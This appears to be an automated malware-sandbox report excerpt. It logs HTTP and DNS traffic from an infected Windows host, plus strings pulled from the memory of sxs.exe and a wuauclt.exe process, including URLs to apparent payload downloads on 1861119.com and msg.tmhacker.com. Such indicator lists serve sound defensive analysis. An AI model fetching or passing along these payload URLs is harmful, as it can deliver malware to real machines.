Source: global trafficHTTP traffic detected: GET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Request-Id: 29c03105-bfe3-4210-967e-5295b3a100a0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.onefordvd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1Host: ad-delivery.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1Host: ad-delivery.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
Source: global trafficHTTP traffic detected: GET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=1741724944339990&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944339992&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=2721724944340427&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944340430&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?pac=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?pac=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=11hs6q014uq&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=lhb5r7xl5det&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
Source: global trafficHTTP traffic detected: GET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=g3yhpaijmirq&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=2gf50ip8fgbm&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lander HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.onefordvd.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.onefordvd.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: expiry_partner=; caf_ipaddr=8.46.123.33; country=US; city=New%20York; lander_type=parking
Source: global trafficDNS traffic detected: DNS query: 1861119.com
Source: global trafficDNS traffic detected: DNS query: www.onefordvd.com
Source: global trafficDNS traffic detected: DNS query: msg.tmhacker.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: btloader.com
Source: global trafficDNS traffic detected: DNS query: img1.wsimg.com
Source: global trafficDNS traffic detected: DNS query: syndicatedsearch.goog
Source: global trafficDNS traffic detected: DNS query: ad-delivery.net
Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: api.aws.parking.godaddy.com
Source: global trafficDNS traffic detected: DNS query: afs.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: www.dvdforone.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: unknownHTTP traffic detected: POST /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveContent-Length: 920sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://www.onefordvd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/1.txt
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/1.txtO
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/1.txtW
Source: sxs.exe, 00000000.00000002.2041399746.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/1.txtnss
Source: sxs.exe, 00000000.00000003.2035087789.0000000002172000.00000004.00001000.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.tx
Source: wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.txt
Source: wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.txt/
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.txt_
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.txthT;
Source: wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.txtlate
Source: sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/ie.txt~
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exe
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exe$N
Source: sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exe.
Source: wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exe0U
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exe3N
Source: wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exe8
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exeE
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exeb1
Source: sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1861119.com/index.exeq#
Source: chromecache_112.8.dr, chromecache_103.8.drString found in binary or memory: http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/down.txt
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/down.txtrj
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/down.txtrp
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.t
